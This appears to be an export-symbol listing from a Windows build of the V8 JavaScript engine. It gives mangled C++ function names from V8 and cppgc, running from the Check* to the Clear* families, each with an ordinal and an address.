                                                                                                                                                                                                                                    ?CheckFloat64Hole@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckFloat64HoleMode@234@AEBUFeedbackSource@234@@Z42260x1410d53e0
                                                                                                                                                                                                                                    ?CheckFloatingPointParameters@CallInterfaceDescriptor@internal@v8@@IEAA_NPEAVCallInterfaceDescriptorData@23@@Z42270x14057e9a0
                                                                                                                                                                                                                                    ?CheckFunctionName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4LanguageMode@23@PEBVAstRawString@23@W4FunctionNameValidity@23@AEBULocation@Scanner@23@@Z42280x14088d8e0
                                                                                                                                                                                                                                    ?CheckGC@StackGuard@internal@v8@@QEAA_NXZ42290x14053e4a0
                                                                                                                                                                                                                                    ?CheckGreedyLoop@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z42300x140854640
                                                                                                                                                                                                                                    ?CheckGreedyLoop@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z42310x14056ea50
                                                                                                                                                                                                                                    ?CheckGrowSharedMemory@StackGuard@internal@v8@@QEAA_NXZ42320x14053e4b0
                                                                                                                                                                                                                                    ?CheckHardwareSupportsSimd@wasm@internal@v8@@YA_NXZ42330x1406bf670
                                                                                                                                                                                                                                    ?CheckHeapObject@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42340x1410d5500
                                                                                                                                                                                                                                    ?CheckIf@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@W4DeoptimizeReason@34@@Z42350x1410e2050
                                                                                                                                                                                                                                    ?CheckIf@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z42360x1410d5510
                                                                                                                                                                                                                                    ?CheckIfConstructor@JSCallReducer@compiler@internal@v8@@AEAAXPEAVNode@234@@Z42370x141160e50
                                                                                                                                                                                                                                    ?CheckIfElementsKind@JSCallReducer@compiler@internal@v8@@AEAAXPEAVNode@234@W4ElementsKind@34@0PEAPEAV5234@2@Z42380x1411613b0
                                                                                                                                                                                                                                    ?CheckInOrOf@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEAW4VisitMode@ForEachStatement@23@@Z42390x14088d940
                                                                                                                                                                                                                                    ?CheckInitializedImpl@Internals@internal@v8@@SAXPEAVIsolate@3@@Z42400x140c7be50
                                                                                                                                                                                                                                    ?CheckInstallBaselineCode@StackGuard@internal@v8@@QEAA_NXZ42410x14053e4c0
                                                                                                                                                                                                                                    ?CheckInstallCode@StackGuard@internal@v8@@QEAA_NXZ42420x14053e4d0
                                                                                                                                                                                                                                    ?CheckInstallMaglevCode@StackGuard@internal@v8@@QEAA_NXZ42430x14053e4e0
                                                                                                                                                                                                                                    ?CheckInternalizedString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42440x1410d59f0
                                                                                                                                                                                                                                    ?CheckInterrupt@StackGuard@internal@v8@@AEAA_NW4InterruptFlag@123@@Z42450x140b583e0
                                                                                                                                                                                                                                    ?CheckIsolateLayout@Isolate@internal@v8@@AEAAXXZ42460x1400971a0
                                                                                                                                                                                                                                    ?CheckLogWasmCode@StackGuard@internal@v8@@QEAA_NXZ42470x14053e4f0
                                                                                                                                                                                                                                    ?CheckMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Flags@W4CheckMapsFlag@compiler@internal@v8@@H@base@4@V?$ZoneHandleSet@VMap@internal@v8@@@34@AEBUFeedbackSource@234@@Z42480x1410d5a00
                                                                                                                                                                                                                                    ?CheckMemoryIsZeroed@GCInfoTable@internal@cppgc@@AEAAXPEA_K_K@Z42490x1400971a0
                                                                                                                                                                                                                                    ?CheckMinusZeroParametersOf@compiler@internal@v8@@YAAEBVCheckMinusZeroParameters@123@PEBVOperator@123@@Z42500x1403a2160
                                                                                                                                                                                                                                    ?CheckNoArrayBufferBackingStores@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAAXXZ42510x1407d1ca0
                                                                                                                                                                                                                                    ?CheckNoArrayBufferBackingStores@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAAXXZ42520x1407d1ca0
                                                                                                                                                                                                                                    ?CheckNoDirtyFinalizationRegistries@StartupSerializer@internal@v8@@QEAAXXZ42530x1407d0810
                                                                                                                                                                                                                                    ?CheckNotAtStart@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z42540x140854710
                                                                                                                                                                                                                                    ?CheckNotAtStart@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z42550x14056eb50
                                                                                                                                                                                                                                    ?CheckNotBackReference@RegExpBytecodeGenerator@internal@v8@@UEAAXH_NPEAVLabel@23@@Z42560x1408547e0
                                                                                                                                                                                                                                    ?CheckNotBackReference@RegExpMacroAssemblerX64@internal@v8@@UEAAXH_NPEAVLabel@23@@Z42570x14056ec60
                                                                                                                                                                                                                                    ?CheckNotBackReferenceIgnoreCase@RegExpBytecodeGenerator@internal@v8@@UEAAXH_N0PEAVLabel@23@@Z42580x1408548c0
                                                                                                                                                                                                                                    ?CheckNotBackReferenceIgnoreCase@RegExpMacroAssemblerX64@internal@v8@@UEAAXH_N0PEAVLabel@23@@Z42590x14056f0e0
                                                                                                                                                                                                                                    ?CheckNotCharacter@RegExpBytecodeGenerator@internal@v8@@UEAAXIPEAVLabel@23@@Z42600x1408549b0
                                                                                                                                                                                                                                    ?CheckNotCharacter@RegExpMacroAssemblerX64@internal@v8@@UEAAXIPEAVLabel@23@@Z42610x14056f850
                                                                                                                                                                                                                                    ?CheckNotCharacterAfterAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXIIPEAVLabel@23@@Z42620x140854ae0
                                                                                                                                                                                                                                    ?CheckNotCharacterAfterAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXIIPEAVLabel@23@@Z42630x14056f8c0
                                                                                                                                                                                                                                    ?CheckNotCharacterAfterMinusAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXGGGPEAVLabel@23@@Z42640x140854c30
                                                                                                                                                                                                                                    ?CheckNotCharacterAfterMinusAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGGPEAVLabel@23@@Z42650x14056f990
                                                                                                                                                                                                                                    ?CheckNotTaggedHole@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42660x1410d5ad0
                                                                                                                                                                                                                                    ?CheckNumber@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z42670x141249ce0
                                                                                                                                                                                                                                    ?CheckNumber@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42680x1410d5ae0
                                                                                                                                                                                                                                    ?CheckObjectType@internal@v8@@YA_K_K00@Z42690x14050fb40
                                                                                                                                                                                                                                    ?CheckPageFlag@TurboAssembler@internal@v8@@QEAAXVRegister@23@0HW4Condition@23@PEAVLabel@23@W4Distance@623@@Z42700x1405f5450
                                                                                                                                                                                                                                    ?CheckParams@WriteBarrier@internal@cppgc@@SAXW4Type@123@AEBUParams@123@@Z42710x1400971a0
                                                                                                                                                                                                                                    ?CheckPointerImpl@SameThreadEnabledCheckingPolicyBase@internal@cppgc@@IEAAXPEBX_N1@Z42720x14050b9a0
                                                                                                                                                                                                                                    ?CheckPosition@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z42730x14056fad0
                                                                                                                                                                                                                                    ?CheckPossibleEvalCall@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4PossiblyEval@Call@23@PEAVExpression@23@_NPEAVScope@23@@Z42740x14088d9b0
                                                                                                                                                                                                                                    ?CheckPreemption@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ42750x14056fc20
                                                                                                                                                                                                                                    ?CheckReceiver@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42760x1410d5c20
                                                                                                                                                                                                                                    ?CheckReceiverOrNullOrUndefined@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42770x1410d5c30
                                                                                                                                                                                                                                    ?CheckRegion@RegionAllocator@base@v8@@QEAA_K_K@Z42780x1410009e0
                                                                                                                                                                                                                                    ?CheckRehashability@ContextSerializer@internal@v8@@AEAAXVHeapObject@23@@Z42790x1407ec360
                                                                                                                                                                                                                                    ?CheckSmi@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42800x1410d5c40
                                                                                                                                                                                                                                    ?CheckSmi@TurboAssembler@internal@v8@@QEAA?AW4Condition@23@VOperand@23@@Z42810x1405f5600
                                                                                                                                                                                                                                    ?CheckSmi@TurboAssembler@internal@v8@@QEAA?AW4Condition@23@VRegister@23@@Z42820x1405f5640
                                                                                                                                                                                                                                    ?CheckSpecialCharacterClass@RegExpMacroAssemblerX64@internal@v8@@UEAA_NW4StandardCharacterSet@23@PEAVLabel@23@@Z42830x14056fcb0
                                                                                                                                                                                                                                    ?CheckStackAlignment@TurboAssembler@internal@v8@@QEAAXXZ42840x1405f5670
                                                                                                                                                                                                                                    ?CheckStackGuardState@RegExpMacroAssemblerX64@internal@v8@@SAHPEA_K_K1@Z42850x1405703a0
                                                                                                                                                                                                                                    ?CheckStackLimit@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ42860x1405703f0
                                                                                                                                                                                                                                    ?CheckStackOverflow@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXXZ42870x14088da30
                                                                                                                                                                                                                                    ?CheckStrictOctalLiteral@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXHH@Z42880x14088da60
                                                                                                                                                                                                                                    ?CheckString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42890x1410d5d20
                                                                                                                                                                                                                                    ?CheckSubsample@CpuProfile@internal@v8@@QEAA_NVTimeDelta@base@3@@Z42900x140865e10
                                                                                                                                                                                                                                    ?CheckSymbol@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42910x1410d5e00
                                                                                                                                                                                                                                    ?CheckTemplateEscapes@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_N_N@Z42920x14088daf0
                                                                                                                                                                                                                                    ?CheckTerminateExecution@StackGuard@internal@v8@@QEAA_NXZ42930x14053e500
                                                                                                                                                                                                                                    ?CheckValue@TracedReferenceBase@v8@@IEBAXXZ42940x140c7bed0
                                                                                                                                                                                                                                    ?CheckWasmCodeGC@StackGuard@internal@v8@@QEAA_NXZ42950x14053e510
                                                                                                                                                                                                                                    ?CheckedFloat64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z42960x1410d5e10
                                                                                                                                                                                                                                    ?CheckedFloat64ToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z42970x1410d5f30
                                                                                                                                                                                                                                    ?CheckedInt32Add@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42980x1410d6050
                                                                                                                                                                                                                                    ?CheckedInt32Div@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42990x1410d6060
                                                                                                                                                                                                                                    ?CheckedInt32Mod@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ43000x1410d6070
                                                                                                                                                                                                                                    ?CheckedInt32Mul@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@@Z43010x1410d6080
                                                                                                                                                                                                                                    ?CheckedInt32Sub@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ43020x1410d60c0
                                                                                                                                                                                                                                    ?CheckedInt32ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43030x1410d60d0
                                                                                                                                                                                                                                    ?CheckedInt64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43040x1410d61b0
                                                                                                                                                                                                                                    ?CheckedInt64ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43050x1410d6290
                                                                                                                                                                                                                                    ?CheckedTaggedSignedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43060x1410d6370
                                                                                                                                                                                                                                    ?CheckedTaggedToArrayIndex@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43070x1410d6450
                                                                                                                                                                                                                                    ?CheckedTaggedToFloat64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckTaggedInputMode@234@AEBUFeedbackSource@234@@Z43080x1410d6530
                                                                                                                                                                                                                                    ?CheckedTaggedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z43090x1410d6660
                                                                                                                                                                                                                                    ?CheckedTaggedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z43100x1410d6780
                                                                                                                                                                                                                                    ?CheckedTaggedToTaggedPointer@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43110x1410d68a0
                                                                                                                                                                                                                                    ?CheckedTaggedToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43120x1410d6980
                                                                                                                                                                                                                                    ?CheckedTruncateTaggedToWord32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckTaggedInputMode@234@AEBUFeedbackSource@234@@Z43130x1410d6a60
                                                                                                                                                                                                                                    ?CheckedUint32Bounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z43140x1410d6b90
                                                                                                                                                                                                                                    ?CheckedUint32Div@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ43150x1410d6ce0
                                                                                                                                                                                                                                    ?CheckedUint32Mod@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ43160x1410d6cf0
                                                                                                                                                                                                                                    ?CheckedUint32ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43170x1410d6d00
                                                                                                                                                                                                                                    ?CheckedUint32ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43180x1410d6de0
                                                                                                                                                                                                                                    ?CheckedUint64Bounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z43190x1410d6ec0
                                                                                                                                                                                                                                    ?CheckedUint64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43200x1410d7010
                                                                                                                                                                                                                                    ?CheckedUint64ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z43210x1410d70f0
                                                                                                                                                                                                                                    ?Checkpoint@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ43220x1410398b0
                                                                                                                                                                                                                                    ?Checkpoint@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VFrameState@234@@Z43230x1410e2100
                                                                                                                                                                                                                                    ?Checksum@internal@v8@@YAIV?$Vector@$$CBE@base@2@@Z43240x1407d49d0
                                                                                                                                                                                                                                    ?Clamp@Bignum@base@v8@@AEAAXXZ43250x1410044e0
                                                                                                                                                                                                                                    ?Class@FieldType@internal@v8@@SA?AV123@VMap@23@@Z43260x140097ad0
                                                                                                                                                                                                                                    ?Class@FieldType@internal@v8@@SA?AV?$Handle@VFieldType@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@@Z43270x1409a83b0
                                                                                                                                                                                                                                    ?ClassConstructor@Type@compiler@internal@v8@@SA?AV1234@XZ43280x14057ea20
                                                                                                                                                                                                                                    ?ClassFieldVariableName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEBVAstRawString@23@PEAVAstValueFactory@23@H@Z43290x14088db50
                                                                                                                                                                                                                                    ?ClassFieldsSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ43300x140a5ae50
                                                                                                                                                                                                                                    ?ClassOf@ControlEquivalence@compiler@internal@v8@@QEAA_KPEAVNode@234@@Z43310x1411d5fc0
                                                                                                                                                                                                                                    ?ClassPropertyKindFor@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4Kind@ClassLiteralProperty@23@W4ParsePropertyKind@23@@Z43320x14088dd80
                                                                                                                                                                                                                                    ?ClassifyArrowParameter@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAV?$AccumulationScope@U?$ParserTypes@VParser@internal@v8@@@internal@v8@@@23@HPEAVExpression@23@@Z43330x14088ddd0
                                                                                                                                                                                                                                    ?ClassifyParameter@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@HH@Z43340x14088df30
                                                                                                                                                                                                                                    ?ClassifyPropertyIdentifier@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NW4Value@Token@23@PEAUParsePropertyInfo@123@@Z43350x14088dfd0
                                                                                                                                                                                                                                    ?CleanupOnStackReferencesBelowCurrentStackPosition@GlobalHandles@internal@v8@@QEAAXXZ43360x140b4c210
                                                                                                                                                                                                                                    ?Clear@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA?AV?$Handle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V423@@Z43370x1408f8bc0
                                                                                                                                                                                                                                    ?Clear@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA?AV?$Handle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V423@@Z43380x1408f8c60
                                                                                                                                                                                                                                    ?Clear@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SA?AV?$Handle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@@Z43390x1408f8d00
                                                                                                                                                                                                                                    ?Clear@ActiveSystemPages@base@heap@@QEAA_KXZ43400x1405202c0
                                                                                                                                                                                                                                    ?Clear@AddressToTraceMap@internal@v8@@QEAAXXZ43410x14087d7f0
                                                                                                                                                                                                                                    ?Clear@BackingStore@internal@v8@@AEAAXXZ43420x140a067f0
                                                                                                                                                                                                                                    ?Clear@BitVector@internal@v8@@QEAAXXZ43430x14053e520
                                                                                                                                                                                                                                    ?Clear@CodeMap@internal@v8@@QEAAXXZ43440x140865e40
                                                                                                                                                                                                                                    ?Clear@CodeObjectRegistry@internal@v8@@QEAAXXZ43450x140b48a30
                                                                                                                                                                                                                                    ?Clear@CompilationCache@internal@v8@@QEAAXXZ43460x140c0b6f0
                                                                                                                                                                                                                                    ?Clear@FeedbackNexus@internal@v8@@QEAA_NXZ43470x1409a9100
                                                                                                                                                                                                                                    ?Clear@FreeList@internal@cppgc@@QEAAXXZ43480x14051cea0
                                                                                                                                                                                                                                    ?Clear@IdentityMapBase@internal@v8@@IEAAXXZ43490x1407bb560
                                                                                                                                                                                                                                    ?Clear@Map@v8@@QEAAXXZ43500x140c7bfa0
                                                                                                                                                                                                                                    ?Clear@MarkingWorklists@internal@v8@@QEAAXXZ43510x140abec40
                                                                                                                                                                                                                                    ?Clear@NativeContextStats@internal@v8@@QEAAXXZ43520x140ab9c40
                                                                                                                                                                                                                                    ?Clear@OSROptimizedCodeCache@internal@v8@@SAXPEAVIsolate@23@VNativeContext@23@@Z43530x1408f4d70
                                                                                                                                                                                                                                    ?Clear@ObjectStartBitmap@internal@cppgc@@QEAAXXZ43540x14051a140
                                                                                                                                                                                                                                    ?Clear@SegmentBase@internal@base@heap@@QEAAXXZ43550x14053e560
                                                                                                                                                                                                                                    ?Clear@Set@v8@@QEAAXXZ43560x140c7bff0
                                                                                                                                                                                                                                    ?Clear@StubCache@internal@v8@@QEAAXXZ43570x140a84af0
                                                                                                                                                                                                                                    ?Clear@WeakCodeRegistry@internal@v8@@QEAAXXZ43580x14085cb80
                                                                                                                                                                                                                                    ?ClearAllBreakPoints@Debug@internal@v8@@AEAAXXZ43590x140bb81b0
                                                                                                                                                                                                                                    ?ClearAllDebugInfos@Debug@internal@v8@@AEAAXAEBV?$function@$$A6AXV?$Handle@VDebugInfo@internal@v8@@@internal@v8@@@Z@std@@@Z43600x140bb82e0
                                                                                                                                                                                                                                    ?ClearAllDebuggerHints@Debug@internal@v8@@AEAAXXZ43610x140bb8460
                                                                                                                                                                                                                                    ?ClearAllUsedNodes@CrossThreadPersistentRegion@internal@cppgc@@QEAAXXZ43620x14050c280
                                                                                                                                                                                                                                    ?ClearAllUsedNodes@PersistentRegionBase@internal@cppgc@@QEAAXXZ43630x14050c2f0
                                                                                                                                                                                                                                    ?ClearAllWorklistsForTesting@MarkerBase@internal@cppgc@@QEAAXXZ43640x1405136f0
                                                                                                                                                                                                                                    ?ClearAllocatorState@PagedSpace@internal@v8@@QEAAXXZ43650x14053e570
                                                                                                                                                                                                                                    ?ClearApiInterrupt@StackGuard@internal@v8@@QEAAXXZ43660x14053e590
                                                                                                                                                                                                                                    ?ClearBlockById@Schedule@compiler@internal@v8@@QEAAXVId@BasicBlock@234@@Z43670x141068560
                                                                                                                                                                                                                                    ?ClearBreakInfo@DebugInfo@internal@v8@@QEAAXPEAVIsolate@23@@Z43680x1409f2d70
                                                                                                                                                                                                                                    ?ClearBreakOnNextFunctionCall@Debug@internal@v8@@QEAAXXZ43690x140bb84c0
                                                                                                                                                                                                                                    ?ClearBreakOnNextFunctionCall@debug@v8@@YAXPEAVIsolate@2@@Z43700x140bc8b40
                                                                                                                                                                                                                                    ?ClearBreakPoint@Debug@internal@v8@@QEAAXV?$Handle@VBreakPoint@internal@v8@@@23@@Z43710x140bb84f0
                                                                                                                                                                                                                                    ?ClearBreakPoint@WasmScript@internal@v8@@SA_NV?$Handle@VScript@internal@v8@@@23@HV?$Handle@VBreakPoint@internal@v8@@@23@@Z43720x1406565b0
                                                                                                                                                                                                                                    ?ClearBreakPointById@WasmScript@internal@v8@@SA_NV?$Handle@VScript@internal@v8@@@23@H@Z43730x140656820
                                                                                                                                                                                                                                    ?ClearBreakPoints@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z43740x140bb8630
                                                                                                                                                                                                                                    ?ClearCachesForTesting@Isolate@v8@@QEAAXXZ43750x140c7c040
                                                                                                                                                                                                                                    ?ClearCodeMap@ProfilerCodeObserver@internal@v8@@QEAAXXZ43760x14087b070
                                                                                                                                                                                                                                    ?ClearCodesInRange@CodeMap@internal@v8@@QEAAX_K0@Z43770x140865ef0
                                                                                                                                                                                                                                    ?ClearDataTableEntry@SwissNameDictionary@internal@v8@@AEAAXPEAVIsolate@23@H@Z43780x14053e5a0
                                                                                                                                                                                                                                    ?ClearDebugBreak@BreakIterator@internal@v8@@QEAAXXZ43790x140bb8940
                                                                                                                                                                                                                                    ?ClearDeoptMarkedAllocationSites@StackGuard@internal@v8@@QEAAXXZ43800x14053e5f0
                                                                                                                                                                                                                                    ?ClearEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ43810x140b662a0
                                                                                                                                                                                                                                    ?ClearEntry@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z43820x14053e600
                                                                                                                                                                                                                                    ?ClearEntry@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z43830x14053e670
                                                                                                                                                                                                                                    ?ClearEntry@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z43840x1409094d0
                                                                                                                                                                                                                                    ?ClearEntry@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z43850x140909530
                                                                                                                                                                                                                                    ?ClearEntry@GlobalDictionary@internal@v8@@QEAAXVInternalIndex@23@@Z43860x14053e6d0
                                                                                                                                                                                                                                    ?ClearEntry@OSROptimizedCodeCache@internal@v8@@AEAAXHPEAVIsolate@23@@Z43870x1408f4e00
                                                                                                                                                                                                                                    ?ClearForThread@WriteBarrier@internal@v8@@SAXPEAVMarkingBarrier@23@@Z43880x140b16380
                                                                                                                                                                                                                                    ?ClearGC@StackGuard@internal@v8@@QEAAXXZ43890x14053e720
                                                                                                                                                                                                                                    ?ClearGrowSharedMemory@StackGuard@internal@v8@@QEAAXXZ43900x14053e730
                                                                                                                                                                                                                                    ?ClearInputs@Node@compiler@internal@v8@@AEAAXHH@Z43910x14102a5f0
                                                                                                                                                                                                                                    ?ClearInstallBaselineCode@StackGuard@internal@v8@@QEAAXXZ43920x14053e740
                                                                                                                                                                                                                                    ?ClearInstallCode@StackGuard@internal@v8@@QEAAXXZ43930x14053e750
                                                                                                                                                                                                                                    ?ClearInstallMaglevCode@StackGuard@internal@v8@@QEAAXXZ43940x14053e760
                                                                                                                                                                                                                                    ?ClearInterrupt@StackGuard@internal@v8@@AEAAXW4InterruptFlag@123@@Z43950x140b58430
                                                                                                                                                                                                                                    ?ClearInvalidSlots@TypedSlotSet@internal@v8@@QEAAXAEBV?$map@IIU?$less@I@std@@V?$allocator@U?$pair@$$CBII@std@@@2@@std@@@Z43960x140a9cf50
                                                                                                                                                                                                                                    ?ClearKeptObjects@Isolate@internal@v8@@QEAAXXZ43970x140b663c0
                                                                                                                                                                                                                                    ?ClearKeptObjects@Isolate@v8@@QEAAXXZ43980x140c7c060
                                                                                                                                                                                                                                    ?ClearLiteral@UnoptimizedCompilationInfo@internal@v8@@QEAAXXZ43990x1407405e0
                                                                                                                                                                                                                                    ?ClearLogWasmCode@StackGuard@internal@v8@@QEAAXXZ44000x14053e770
                                                                                                                                                                                                                                    ?ClearMemoryChunkData@ConcurrentMarking@internal@v8@@QEAAXPEAVMemoryChunk@23@@Z44010x140b426f0
                                                                                                                                                                                                                                    ?ClearMentionedObjectCache@StringStream@internal@v8@@SAXPEAVIsolate@23@@Z44020x1407cd3d0
                                                                                                                                                                                                                                    ?ClearObjectIds@HeapProfiler@v8@@QEAAXXZ44030x140c7c070
                                                                                                                                                                                                                                    ?ClearOneShot@Debug@internal@v8@@AEAAXXZ44040x140bb8990
                                                                                                                                                                                                                                    ?ClearPredecessors@BasicBlock@compiler@internal@v8@@QEAAXXZ44050x140584b30
                                                                                                                                                                                                                                    ?ClearReconstructableDataForSerialization@Snapshot@internal@v8@@SAXPEAVIsolate@23@_N@Z44060x1407d1ce0
                                                                                                                                                                                                                                    ?ClearRegisters@RegExpBytecodeGenerator@internal@v8@@UEAAXHH@Z44070x140854d60
                                                                                                                                                                                                                                    ?ClearRegisters@RegExpMacroAssemblerX64@internal@v8@@UEAAXHH@Z44080x140570480
                                                                                                                                                                                                                                    ?ClearSegment@DateCache@internal@v8@@AEAAXPEAUDST@123@@Z44090x140bd5c90
                                                                                                                                                                                                                                    ?ClearSerializerData@Isolate@internal@v8@@QEAAXXZ44100x140b663d0
                                                                                                                                                                                                                                    ?ClearSideEffectChecks@Debug@internal@v8@@QEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z44110x140bb89f0
                                                                                                                                                                                                                                    ?ClearStepping@Debug@internal@v8@@QEAAXXZ44120x140bb8bb0
                                                                                                                                                                                                                                    ?ClearStepping@DebugInfo@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z44130x140656990
                                                                                                                                                                                                                                    ?ClearStepping@DebugInfo@wasm@internal@v8@@QEAAXPEAVWasmFrame@34@@Z44140x1406569f0
                                                                                                                                                                                                                                    ?ClearStringPaddingIfNeeded@ReadOnlySpace@internal@v8@@QEAAXXZ44150x140aaa1b0
                                                                                                                                                                                                                                    ?ClearSuccessors@BasicBlock@compiler@internal@v8@@QEAAXXZ44160x140584b40
                                                                                                                                                                                                                                    ?ClearTerminateExecution@StackGuard@internal@v8@@QEAAXXZ44170x14053e780
                                                                                                                                                                                                                                    ?ClearWasmCodeGC@StackGuard@internal@v8@@QEAAXXZ44180x14053e790
                                                                                                                                                                                                                                    ?ClearWeak@api_internal@v8@@YAPEAXPEA_K@Z44190x140c7c080
                                                                                                                                                                                                                                    ?ClearWeakness@GlobalHandles@internal@v8@@SAPEAXPEA_K@Z44200x140b4c220
                                                                                                                                                                                                                                    ?ClearedTypedSlot@TypedSlotSet@internal@v8@@CA?AUTypedSlot@TypedSlots@23@XZ44210x14053e7a0
